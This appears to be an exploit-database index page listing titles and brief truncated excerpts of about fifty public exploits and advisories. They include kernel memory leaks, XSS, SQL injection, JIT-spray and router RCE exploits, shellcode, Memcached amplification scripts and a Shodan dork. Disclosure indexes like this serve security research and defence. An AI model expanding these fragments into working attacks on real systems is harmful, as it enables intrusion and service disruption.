Microsoft Windows Kernel - 'nt!NtWaitForDebugEvent' 64-bit Stack Memory Disclosure

/ We have discovered that the nt!NtWaitForDebugEvent system call discloses portions of uninitialized kernel stack memory to user-mode clients, on 64-bit versions of Windows 7 to Windows 10. The output buffer, and the corresponding temporary stack-based buffer in the kernel are 0xB8 184 bytes in...

Coship RT3052 Wireless Router - Persistent Cross-Site Scripting

Exploit Title: Coship RT3052 Wireless Router - Persistent Cross Site Scripting XSS Date: 2018-03-18 Exploit Author: Sayan Chatterjee Vendor Homepage: http://en.coship.com/ Category: Hardware Wifi Router Version: 4.0.0.48 Tested on: Windows 10 CVE: CVE-2018-8772 Proof of Concept =================...

Microsoft Windows - Desktop Bridge Virtual Registry Arbitrary File Read/Write Privilege Escalation

Windows: Windows: Desktop Bridge Virtual Registry Arbitrary File Read/Write EoP Platform: Windows 1709 not tested earlier version Class: Elevation of Privilege Summary: The handling of the virtual registry for desktop bridge applications can allow an application to create arbitrary files as syste...

Microsoft Windows Kernel - 'NtQueryVirtualMemory(MemoryMappedFilenameInformation)' 64-bit Pool Memory Disclosure

/ We have discovered that the nt!NtQueryVirtualMemory system call invoked with the 2 information class MemoryMappedFilenameInformation discloses portions of uninitialized kernel pool memory to user-mode clients. The vulnerability affects 64-bit versions of Windows 7 to 10. The output buffer for...

Cisco node-jos < 0.11.0 - Re-sign Tokens

!/usr/bin/env python3 import base64 from urllib.parse import quoteplus import rsa import sys zi0Black ''' EDB Note: This has been updated https://github.com/offensive-security/exploitdb/pull/139 POC of CVE-2018-0114 Cisco node-jose = 8 return b::-1 def generateheaderpayloadpayload,pubkey: create...

Kamailio 5.1.1 / 5.1.0 / 5.0.0 - Off-by-One Heap Overflow

''' Off-by-one heap overflow in Kamailio - Authors: - Alfred Farrugia - Sandro Gauci - Fixed versions: Kamailio v5.1.2, v5.0.6 and v4.4.7 - References: no CVE assigned yet - Enable Security Advisory: - Tested vulnerable versions: 5.1.1, 5.1.0, 5.0.0 - Timeline: - Report date: 2018-02-10 - Kamaili...

Microsoft Windows Kernel - 'nt!KiDispatchException' 64-bit Stack Memory Disclosure

/ We have discovered a new Windows kernel memory disclosure vulnerability in the creation and copying of a EXCEPTIONRECORD structure to user-mode memory while passing execution to a user-mode exception handler. The vulnerability affects 64-bit versions of Windows 7 to 10. The leak was originally...

Microsoft Windows Kernel - 'NtQueryInformationThread(ThreadBasicInformation)' 64-bit Stack Memory Disclosure

/ We have discovered that the nt!NtQueryInformationThread system call invoked with the 0 information class ThreadBasicInformation discloses portions of uninitialized kernel stack memory to user-mode clients. The vulnerability affects 64-bit versions of Windows 7 to 10. The specific layout of the...

Google Software Updater macOS - Unsafe use of Distributed Objects Privilege Escalation

/ Google software updater ships with Chrome on MacOS and installs a root service com.google.Keystone.Daemon.UpdateEngine which lives here: /Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/GoogleSoftwareUpdateDaemon This service vends a Distributed Object which expos...

OpenSSH < 6.6 SFTP - Command Execution

OpenSSH 8 else 32 print "+ bit libc mapped @ -, path: ".formatBITS, addr0, addr1, path libcbase = intaddr0, 16 libcpath = path if "stack" in line: addr = addr.split"-" saddrstart = intaddr0, 16 saddrend = intaddr1, 16 print "+ Stack mapped @ -".formataddr0,...

Linux/x86 - execve(/bin/sh) Shellcode (18 bytes)

Linux/x86 - execve/bin/sh Shellcode 18 bytes. Shellcode exploit for Linuxx86 platform / Linux/x86 - execve /bin/sh shellcode 18 bytes Author: Anurag Srivastava Tested on: i686 GNU/Linux Shellcode Length: 18 Disassembly of section .text: 08048060 : 8048060: 6a 0b push 0xb 8048062: 58 pop eax...

Microsoft Windows - Desktop Bridge VFS Privilege Escalation

Windows: Windows: Desktop Bridge VFS EoP Platform: Windows 1709 not tested earlier version Class: Elevation of Privilege Summary: The handling of the VFS for desktop bridge applications can allow an application to create virtual files in system folder which can result in EoP. Description: The...

Contec Smart Home 4.15 - Unauthorized Password Reset

Title : Contec smart home 4.15 Unauthorized Password Reset Shodan Dork : "content/smarthome.php" Vendor Homepage : http://contec.co.il Tested on : Google Chrome Tested version : 4.15 Date : 2018-03-14 Author : Z3ro0ne Contact : [email protected] Facebook Page : https://www.facebook.com/Z3ro0...

Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution

CVE-2016-2819 and ASM.JS JIT-Spray "use strict" var Exploit = function this.asmjs = new Asmjs this.heap = new Heap Exploit.prototype.go = function / target address of fake node object / var nodetargetaddr = 0x5a500000 / target address of asm.js float pool payload/ var targeteip = 0x20200b58 / spr...

Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution

46.0.1 -- CVE-2016-1960 and ASM.JS JIT-Spray "use strict" var Exploit = function this.asmjs = new Asmjs this.heap = new Heap Exploit.prototype.go = function / target address of fake node object / var nodetargetaddr = 0x20200000 / target address of asm.js float pool payload/...

Unitrends UEB 10.0 - Root Remote Code Execution

Exploit Title: Unauthenticated root RCE for Unitrends UEB 10.0 Date: 10/17/2017 Exploit Authors: Cale Smith, Benny Husted, Jared Arave Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413 Vendor Homepage: https://www.unitrends.com/ Software Link:...

Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation

/ Ubuntu 16.04.4 kernel priv esc all credits to @bleidl - vnik / // Tested on: // 4.4.0-116-generic 140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x8664 // if different kernel adjust CRED offset + check kernel stack size include include include include include include include include include include...

Android DRM Services - Buffer Overflow

include include include include include include include include include include using namespace android; static sp getCrypto sp sm = defaultServiceManager; sp binder = sm-getServiceString16"media.drm"; sp service = interfacecastbinder; if service == NULL fprintfstderr, "Failed to retrieve...

Microsoft Windows Kernel (7 x86) - Local Privilege Escalation (MS17-017)

include include include include pragma commentlib, "psapi.lib" define POCDEBUG 0 if POCDEBUG == 1 define POCDEBUGBREAK getchar elif POCDEBUG == 2 define POCDEBUGBREAK DebugBreak else define POCDEBUGBREAK endif CONST LONG maxTimes = 2000; CONST LONG tmpTimes = 3000; static HBITMAP hbitmapmaxTimes ...

Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution

// Exploit Title: RCE in PATCH requests in Spring Data REST // Date: 2018-03-10 // Exploit Author: Antonio Francesco Sardella // Vendor Homepage: https://pivotal.io/ // Software Link: https://projects.spring.io/spring-data-rest/ // Version: Spring Data REST versions prior to 2.6.9 Ingalls SR9,...

WordPress Plugin Duplicator 1.2.32 - Cross-Site Scripting

Exploit Title : Duplicator Wordpress Migration Plugin Reflected Cross Site Scripting XSS Date: 25-02-2018 Exploit Author : Stefan Broeder Contact : https://twitter.com/stefanbroeder Vendor Homepage: https://snapcreek.com/ Software Link: https://wordpress.org/plugins/duplicator/ Version: 1.2.32 CV...

MikroTik RouterOS < 6.41.3/6.42rc27 - SMB Buffer Overflow

!/usr/bin/env python import socket import struct import sys import telnetlib NETBIOSSESSIONMESSAGE = "\x00" NETBIOSSESSIONREQUEST = "\x81" NETBIOSSESSIONFLAGS = "\x00" trick from http://shell-storm.org/shellcode/files/shellcode-881.php will place the socket file descriptor in eax findsockfd =...

SAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution

!/usr/bin/env python import argparse import urllib import requests, random from bs4 import BeautifulSoup from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disablewarningsInsecureRequestWarning helpdesc = ''' PoC of Remote Command Execution via Log...

Tuleap 9.17.99.189 - Blind SQL Injection

=============================================================================== title: Tuleap SQL Injection case id: CM-2018-01 product: Tuleap version 9.17.99.189 vulnerability type: Blind SQL injection - time based severity: High found: 2018-02-24 by: Cristiano Maruti @cmaruti...

SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities

SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple Critical Vulnerabilities product: SecurEnvoy SecurMail vulnerable version: 9.1.501 fixed version: 9.2.501 or hotfix patch "1012018" CVE number: CVE-2018-7701,...

SC 7.16 - Stack-Based Buffer Overflow

Exploit Author: Juan Sacco - http://www.exploitpack.com Bug found using Exploit Pack - Local fuzzer feature. Tested on: GNU/Linux - Kali Linux Filename: pool/main/s/sc/sc7.16-4+b2i386.deb Description: SC v7.16 is prone to a basic stack-based buffer overflow vulnerability because the application...

MikroTik RouterOS < 6.38.4 (x86) - 'Chimay Red' Stack Clash Remote Code Execution

!/usr/bin/env python2 Mikrotik Chimay Red Stack Clash Exploit by wsxarcher based on BigNerd95 POC tested on RouterOS 6.38.4 x86 ASLR enabled on libs only DEP enabled import socket, time, sys, struct from pwn import import ropgadget ASTSTACKSIZE = 0x800000 default stack size per thread 8 MB...

Allok QuickTime to AVI MPEG DVD Converter 3.6.1217 - Buffer Overflow

Exploit Title: Allok Video Converter - Buffer Overflow Vulnerability Windows XP SP3 Date: 06-03-2018 Exploit Author: Mohan Ravichandran & Velayutham Selvaraj Organization : TwinTech Solutions Vulnerable Software: Allok Video Converter Vendor Homepage: http://www.alloksoft.com Version: 4.6.1217...

TextPattern 4.6.2 - 'qty' SQL Injection

============================================= MGC ALERT 2018-002 - Original release date: February 12, 2018 - Last revised: March 12, 2018 - Discovered by: Manuel García Cárdenas - Severity: 7,1/10 CVSS Base Score - CVE-ID: CVE-2018-7474 ============================================= I...

ACL Analytics 11.X - 13.0.0.579 - Arbitrary Code Execution

Exploit Title: Arbitrary Code Execution Google Dork: N/A Date: 03-07-2018 Exploit Author: Clutchisback1 Vendor Homepage: https://www.acl.com Software Link: https://www.acl.com/products/acl-analytics/ Version: 11.x - 13.0.0.579 Tested on: Windows 7 pro SP1 x86 Clutchisback1 ///\ I'll get OSCP one...

Advantech WebAccess < 8.3 - Directory Traversal / Remote Code Execution

!/usr/bin/python2.7 Exploit Title: Advantech WebAccess 8.3 webvrpcs Directory Traversal RCE Vulnerability Date: 03-11-2018 Exploit Author: Chris Lyne @lynerc Vendor Homepage: www.advantech.com Software Link:...

Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials

Prisma Industriale Checkweigher PrismaWEB 1.21 Authentication Bypass Vendor: Prisma Industriale S.r.l. Product web page: https://www.prismaindustriale.com Affected version: 1.0 Rev 21, EPROM 202FWSAM ?? Summary: Web Administration of Machine. Desc: The vulnerability exists due to the disclosure o...

DEWESoft X3 SP1 (x64) - Remote Command Execution

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/DEWESOFT-X3-REMOTE-INTERNAL-COMMAND-ACCESS.txt + ISR: Apparition Security Vendor: ============= www.dewesoft.com Product: =========== DEWESoft X3 SP1 64-bit installer - X3...

Eclipse Equinoxe OSGi Console - Command Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'base64' class MetasploitModule 'Eclipse Equinoxe OSGi Console Command Execution', 'Description' = %q Exploit Eclipse Equinoxe OSGi Open Service Gateway initiati...

MikroTik RouterOS < 6.38.4 (MIPSBE) - 'Chimay Red' Stack Clash Remote Code Execution

!/usr/bin/env python3 Mikrotik Chimay Red Stack Clash Exploit by BigNerd95 Tested on RouterOS 6.38.4 mipsbe using a CRS109 Used tools: pwndbg, rasm2, mipsrop for IDA I used ropper only to automatically find gadgets ASLR enabled on libs only DEP NOT enabled import socket, time, sys, struct, re fro...

ManageEngine Applications Manager 13.5 - Remote Code Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "ManageEngine Applications Manager Remote Code Execution", 'Description' = %q This module exploits command injection vulnerability in the...

Sony Playstation 4 (PS4) 4.55 < 5.50 - WebKit Code Execution (PoC)

window.didload = 0; window.didpost = 0; window.onload = function window.didload = 1; if window.didpost == 1 window.stage2; window.postExpl = function window.didpost = 1; if window.didload == 1 window.stage2; function makeid var text = ""; var possible =...

Bacula-Web < 8.0.0-rc2 - SQL Injection

Exploit Title: Multiple SQL injection vulnerabilities in Bacula-Web Date: 2018-03-07 Software Link: http://bacula-web.org/ Exploit Author: Gustavo Sorondo Contact: http://twitter.com/iampuky Website: http://cintainfinita.com/ CVE: CVE-2017-15367 Category: webapps 1. Description Bacula-web before...

WebLog Expert Enterprise 9.4 - Denial of Service

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/WEBLOG-EXPERT-WEB-SERVER-ENTERPRISE-v9.4-DENIAL-OF-SERVICE.txt + ISR: Apparition Security Vendor: ======= www.weblogexpert.com Product: ========= WebLog Expert Web Server...

WebLog Expert Enterprise 9.4 - Authentication Bypass

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/WEBLOG-EXPERT-WEB-SERVER-ENTERPRISE-v9.4-AUTHENTICATION-BYPASS.txt + ISR: Apparition Security Vendor: ======== www.weblogexpert.com Product: ======== WebLog Expert Web Server...

Memcached 1.5.5 - 'Memcrashed ' Insufficient Control of Network Message Volume Denial of Service With Shodan API

-- coding: utf8 -- !/usr/bin/python Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44265.zip import sys, os, time, shodan from pathlib import Path from scapy.all import from contextlib import contextmanager starttime=time.time @contextmanager def...

Redaxo CMS Addon MyEvents 2.2.1 - SQL Injection

Exploit Title: Redaxo CMS Addon MyEvents SQL Injection Backend Date: 01.03.2018 Exploit Author: h0n1gsp3cht Vendor Homepage: http://www.github.com/wende60/myevents Version: 2.2.1 Last Version Tested on: LinuxMint More: Login Required GET Vuln Code + redaxo/src/addons/myevents/pages/eventadd.php...

antMan 0.9.0c - Authentication Bypass

Exploit Title: antMan and the password to a url-encoded linefeed %0a, we can force the authentication script to produce return values not anticipated by the developer. To exploit these defects, use a web proxy to intercept the login attempt and modify the POST parameters as follows:...

Chrome V8 JIT - JSBuiltinReducer::ReduceObjectCreate Fails to Ensure that the Prototype is "null"

/ I think this commit has introduced the bug. https://chromium.googlesource.com/v8/v8/+/ff7063c7d5d8ad8eafcce3da59e65d7fe2b4f915%5E%21/F2 According to the description, Object.create is supposed to be inlined only when the prototype given as the parameter is "null". The following check has to...

Bravo Tejari Web Portal - Cross-Site Request Forgery

Exploit Title: Bravo Tejari Web Portal-CSRF CVE-ID: CVE-2018-7216 Vulnerability Type: Cross Site Request Forgery CSRF Vendor of Product: Tejari Affected Product Code Base: Bravo Solution Affected Component: Web Interface Management. Attack Type: Local - Authenticated Impact: Unauthorised Access...

Chrome V8 JIT - Simplified-lowererer IrOpcode::kStoreField, IrOpcode::kStoreElement Optimization Bug

/ I think this commit has introduced the bugs: https://chromium.googlesource.com/v8/v8/+/c22ca7f73ba92f22d0cd29b06bb2944a545a8d3e%5E%21/F0 Here's a snippet. case IrOpcode::kStoreField: FieldAccess access = FieldAccessOfnode-op; Node valuenode = node-InputAt1; NodeInfo inputinfo = GetInfovaluenode...

Softros Network Time System Server 2.3.4 - Denial of Service

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/SOFTROS-NETWORK-TIME-SYSTEM-SERVER-v2.3.4-DENIAL-OF-SERVICE.txt + ISR: Apparition Security Vendor: ============= www.softros.com https://nts.softros.com/downloads/ Product:...

Chrome V8 JIT - 'GetSpecializationContext' Type Confusion

PoC: function optarg = = arg let tmp = opt.x; // LdaNamedProperty for ;; arg; yield; function inner tmp; break; for let i = 0; i arg; this; , opt let tmp = arg.x; for ;; arg; yield; tmp = inner tmp; ; for let i = 0; i 10000; i++ opt; What happened: 1. The LdaNamedProperty operation "opt.x" was...

Chrome V8 JIT - Empty BytecodeJumpTable Out-of-Bounds Read

/ In the current implementation, the bytecode generator also emits empty jump tables. https://cs.chromium.org/chromium/src/v8/src/interpreter/bytecode-array-writer.cc?rcl=111e990462823c9faeee06b67c0dcf05749d4da8&l=89 So the bytecode for the example code would be generated as follows: Code: functi...

Memcached 1.5.5 - 'Memcrashed' Insufficient Control Network Message Volume Denial of Service (2)

Written by Alex Conrey Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44254.zip This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, eithe...